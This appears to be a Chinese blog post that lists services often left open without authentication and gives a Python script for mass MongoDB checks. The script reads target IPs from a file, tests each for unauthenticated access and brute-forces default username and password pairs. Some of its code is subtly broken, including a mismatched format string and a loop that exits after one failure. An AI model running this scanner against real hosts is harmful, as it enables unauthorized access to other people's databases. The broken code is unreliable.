Hadoop
Solr
Hudson
Jenkins
memcache
Couchdb
ES
redis
rsync
Zookeeper
JBOSS
脚本
1 #Mongodb 2 # -*- coding:utf-8 -*- 3 4 import pymongo 5 from pymongo.errors import ServerSelectionTimeoutError 6 7 def verify(ip,port): 8 host = ip+':'+str(port) 9 port = int(port) 10 loginnames = ['admin','test','user','root'] 11 passwd = ['','123456','test','12345678','12345679','root','123456Aa','123456_Aa','123456aA','123456_aA','123QWEASD','admin123','admin','1q2w3e4r','134679'] 12 print('testing if mongodb vul') 13 #是否无认证 14 try: 15 connection = pymongo.MongoClient(ip,port,serverSelectionTimeoutMS=1000) 16 dbs = connection.database_names() 17 msg = 'There is a mongodb unauthorized access , password is None' 18 number = 'v9' 19 print(dbs) 20 return True,host,number,msg 21 #端口连不上,直接退出 22 except ServerSelectionTimeoutError as e: 23 msg = str(e) 24 number = 'v0' 25 return False,host,number,msg 26 except Exception as e: 27 msg = str(e) 28 number = 'v0' 29 #爆破 30 for loginname in loginnames: 31 for ps in passwd: 32 try: 33 connection.api.authenticate(loginname,ps) 34 dbs = connection.database_names() 35 msg = 'There is a mongodb unauthorized access , username/password is %s' %(loginname,ps) 36 number = 'v9' 37 print(msg) 38 return True,host,number,msg 39 except Exception as e: 40 msg = str(e) 41 number = 'v0' 42 return False,host,number,msg 43 44 if __name__ == '__main__': 45 def get_pass_dict(): 46 pass_dict = [] 47 with open('./IP.txt', 'r') as f: 48 for line in f.readlines(): 49 line = line.strip('\n') 50 pass_dict.append(line) 51 f.close() 52 return pass_dict 53 IP = get_pass_dict() 54 for ip in IP: 55 port = '27017' 56 res = verify(ip, port) 57 print(res)
扫一扫
1013
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
